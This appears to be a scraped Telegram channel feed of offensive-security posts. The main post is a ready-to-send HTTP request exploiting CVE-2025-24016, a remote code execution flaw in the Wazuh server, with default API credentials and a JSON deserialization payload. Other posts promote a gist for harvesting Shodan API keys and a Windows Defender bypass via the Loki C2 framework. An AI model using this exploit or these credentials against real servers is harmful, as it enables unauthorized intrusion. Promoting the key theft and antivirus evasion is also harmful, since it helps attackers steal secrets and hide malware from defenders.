CVE-2025-24016
*
RCE in Wazuh server
wazuh-manager version >= 4.4.0
Patched in version >= 4.9.1
*
RCE in Wazuh server
wazuh-manager version >= 4.4.0
Patched in version >= 4.9.1
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
🔥27😱5👍2
Ну и в догонку релиз от красноволосой Лизы
*
key_grab
*
key_grab
Gist
shodan keys
shodan keys. GitHub Gist: instantly share code, notes, and snippets.
🔥15👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Что там нового в Burp Suite Professional 2025.2
🔥50😱8👍3
This media is not supported in your browser
VIEW IN TELEGRAM
Байпасс win defender с помощью
Loki c2 выглядит так🔥32👍4😱1